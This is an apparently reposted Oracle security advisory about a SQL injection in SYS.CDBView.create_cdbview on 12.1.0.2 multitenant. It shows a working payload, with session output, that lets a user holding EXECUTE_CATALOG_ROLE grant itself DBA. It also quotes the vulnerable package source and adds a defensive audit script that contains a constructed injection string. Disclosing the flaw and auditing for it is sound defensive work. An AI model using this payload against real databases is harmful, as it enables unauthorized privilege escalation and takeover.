[Security Warning] Guarding against the high-risk SQL injection in Oracle 12c Multitenant
When the Oracle Multitenant option is in use, the container database (CDB) and its PDBs coexist in one merged architecture, so privilege control becomes even more important. As we noted in an earlier article, the lockdown profile in Oracle 12.2 exists precisely to provide more comprehensive privilege control inside a PDB.
In the 2016 "Bitcoin incident" we summarised the Sixteen Rules of Data Security, one of which explicitly states the principle of least privilege, and that privilege management must actually be enforced.
The risk of SQL injection attacks
Let us look at the database security risk that can arise when privileges are not controlled properly. According to one recently disclosed risk, SQL injection can compromise the security of the database; the issue below affects the latest multitenant release, 12.1.0.2.0.
Suppose we have an ordinary user in the CDB which, for some reason, has requested and been granted the EXECUTE_CATALOG_ROLE role:
SQL> connect / as sysdba
Connected.
SQL> create user c##eygle identified by eygle;
User created.
SQL> grant execute_catalog_role,create session to c##eygle;
Grant succeeded.
SQL> select granted_role from user_role_privs;
GRANTED_ROLE
---------------------------------------------
EXECUTE_CATALOG_ROLE
Let us see what can be attempted from this role; the frequently discussed SQL injection falls within exactly this area.
Once the following series of SQL statements has been executed, an ordinary user has obtained DBA privileges. In a multitenant environment, this privilege escalation is extremely dangerous:
SQL> connect c##eygle/eygle
Connected.
SQL> select granted_role from user_role_privs;
GRANTED_ROLE
-----------------------------------------------------
EXECUTE_CATALOG_ROLE
SQL> exec sys.CDBView.create_cdbview(true,'ALL_POLICIES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','yh_view' ,' */ execute immediate ''grant dba to c##eygle''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
*
ERROR at line 1:
ORA-00905: missing keyword
ORA-06512: at "SYS.CDBVIEW", line 58
ORA-06512: at line 1
SQL> select /*+WITH_PLSQL*/ * from ALL_POLICIES;
X
-------
1
SQL> select granted_role from user_role_privs;
GRANTED_ROLE
----------------------------
DBA
EXECUTE_CATALOG_ROLE
SQL> select banner from v$version;
BANNER
----------------------------------------------------------------------------------------
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
PL/SQL Release 12.1.0.2.0 - Production
CORE 12.1.0.2.0 Production
TNS for Linux: Version 12.1.0.2.0 - Production
NLSRTL Version 12.1.0.2.0 - Production
Of course, any experienced DBA should know that the EXECUTE_CATALOG_ROLE role is extremely dangerous and that its granting must be strictly controlled. This injection actually exploits a validation flaw in the CDBView package to escalate privileges.
The main content of the sys.CDBView package is shown below (it appears in clear text in the installation scripts); the risk comes from the missing validation inside the script:
create or replace package sys.CDBView as
----------------------------
-- PROCEDURES AND FUNCTIONS
--
procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2,
oldview_name IN varchar2, newview_name IN varchar2);
end CDBView;
/
grant execute on sys.CDBView to execute_catalog_role
/
create or replace package body sys.CDBView is
-- Create the cdb view
-- private helper procedure to create the cdb view
-- Note that quotes should not be added around owner, oldview_name and
-- newview_name before create_cdbview is invoked since all three are used
-- as literals to query dictionary views.
procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2,
oldview_name IN varchar2, newview_name IN varchar2) as
sqlstmt varchar2(4000);
col_name varchar2(128);
comments varchar2(4000);
col_type number;
upper_owner varchar2(128);
upper_oldview varchar2(128);
quoted_owner varchar2(130); -- 2 more than size of owner
quoted_oldview varchar2(130); -- 2 more than size of oldview_name
quoted_newview varchar2(130); -- 2 more than size of newview_name
cursor tblcommentscur is select c.comment$
from sys.obj$ o, sys.user$ u, sys.com$ c
where o.name = upper_oldview and u.name = upper_owner
and o.obj# = c.obj# and o.owner#=u.user# and o.type# = 4
and c.col# is null;
cursor colcommentscur is select c.name, co.comment$, c.type#
from sys.obj$ o, sys.col$ c, sys.user$ u, sys.com$ co
where o.name = upper_oldview and u.name = upper_owner
and o.owner# = u.user# and o.type# = 4 and o.obj# = c.obj#
and c.obj# = co.obj# and c.intcol# = co.col#
and bitand(c.property, 32) = 0;
begin
-- convert owner and view names to upper case
upper_owner := upper(owner);
upper_oldview := upper(oldview_name);
quoted_owner := '"' || upper_owner || '"';
quoted_oldview := '"' || upper_oldview || '"';
quoted_newview := '"' || upper(newview_name) || '"';
-- create cdb view
sqlstmt := 'CREATE OR REPLACE VIEW ' ||
quoted_owner || '.' || quoted_newview ||
' CONTAINER_DATA AS SELECT * FROM CONTAINERS(' ||
quoted_owner || '.' || quoted_oldview || ')';
--dbms_output.put_line(sqlstmt);
execute immediate sqlstmt;
......
end if;
end loop;
close colcommentscur;
end;
end CDBView;
/
show errors;
/
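As an added example, not from the original article and not Oracle's own code, the following SQL*Plus script audits a 12.1.0.2 CDB for the conditions the article describes: non-Oracle-maintained grantees of EXECUTE_CATALOG_ROLE and DBA, direct EXECUTE grants on SYS.CDBVIEW, views that embed an inline PL/SQL function, and the identifier validation (DBMS_ASSERT) that create_cdbview omits. It assumes it is run in CDB$ROOT as SYSDBA and that CDB_VIEWS.TEXT_VC exists in this release; the two test names in step 4 are constructed.

```sql
-- Added audit script; not the article's own code and not Oracle's. Run in CDB$ROOT as SYSDBA.
-- Assumption: 12.1.0.2 dictionary, and CDB_VIEWS.TEXT_VC (first 4000 bytes of view text) is present.
SET LINESIZE 200 PAGESIZE 100 SERVEROUTPUT ON

-- 1. Grantees of EXECUTE_CATALOG_ROLE or DBA in any container, excluding Oracle-maintained
--    accounts. A c## user listed here is exactly the starting condition of the article.
SELECT rp.con_id, rp.grantee, rp.granted_role, rp.admin_option
  FROM cdb_role_privs rp
  LEFT JOIN cdb_users u
    ON u.username = rp.grantee AND u.con_id = rp.con_id
 WHERE rp.granted_role IN ('EXECUTE_CATALOG_ROLE', 'DBA')
   AND NVL(u.oracle_maintained, 'N') = 'N'      -- roles as grantees have no cdb_users row
 ORDER BY rp.con_id, rp.granted_role, rp.grantee;

-- 2. Direct EXECUTE grants on SYS.CDBVIEW besides the role grant in the install script.
SELECT con_id, grantee, privilege, grantable
  FROM cdb_tab_privs
 WHERE owner = 'SYS' AND table_name = 'CDBVIEW'
 ORDER BY con_id, grantee;

-- 3. Views whose definition embeds an inline PL/SQL function (the WITH FUNCTION clause the
--    injected view relied on). Legitimate uses exist, so review the owners rather than drop.
SELECT con_id, owner, view_name
  FROM cdb_views
 WHERE REGEXP_LIKE(text_vc, 'WITH\s+FUNCTION', 'i')
 ORDER BY con_id, owner, view_name;

-- 4. The identifier check that create_cdbview omits before concatenating oldview_name:
--    DBMS_ASSERT.ENQUOTE_NAME rejects a "name" carrying an unpaired double quote and trailing SQL.
DECLARE
  good_name VARCHAR2(200) := 'all_policies';                            -- constructed
  bad_name  VARCHAR2(200) := 'ALL_POLICIES" AS SELECT 1 FROM DUAL--';   -- constructed
BEGIN
  DBMS_OUTPUT.PUT_LINE('accepted: ' || dbms_assert.enquote_name(good_name));  -- "ALL_POLICIES"
  BEGIN
    DBMS_OUTPUT.PUT_LINE('accepted: ' || dbms_assert.enquote_name(bad_name));
  EXCEPTION
    WHEN OTHERS THEN
      DBMS_OUTPUT.PUT_LINE('rejected: ' || SQLERRM);   -- expected: ORA-44003 invalid SQL name
  END;
END;
/
```

Any row from step 1 or 2 that is not an Oracle-maintained account should be revoked or justified, and step 3 only flags candidates for review, since inline PL/SQL functions in views are a supported 12c feature.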
Security risks are everywhere; raising security awareness cannot wait.
On Enmotech's Bethune automated health-check platform we have already issued this warning to users. We strongly recommend using the Bethune platform ( https://bethune.enmotech.com ) to check your database's security risks and performance status; the platform is currently completely free.
This article is reposted from the Data and Cloud WeChat official account; original link
Last updated: 2017-07-18 11:04:04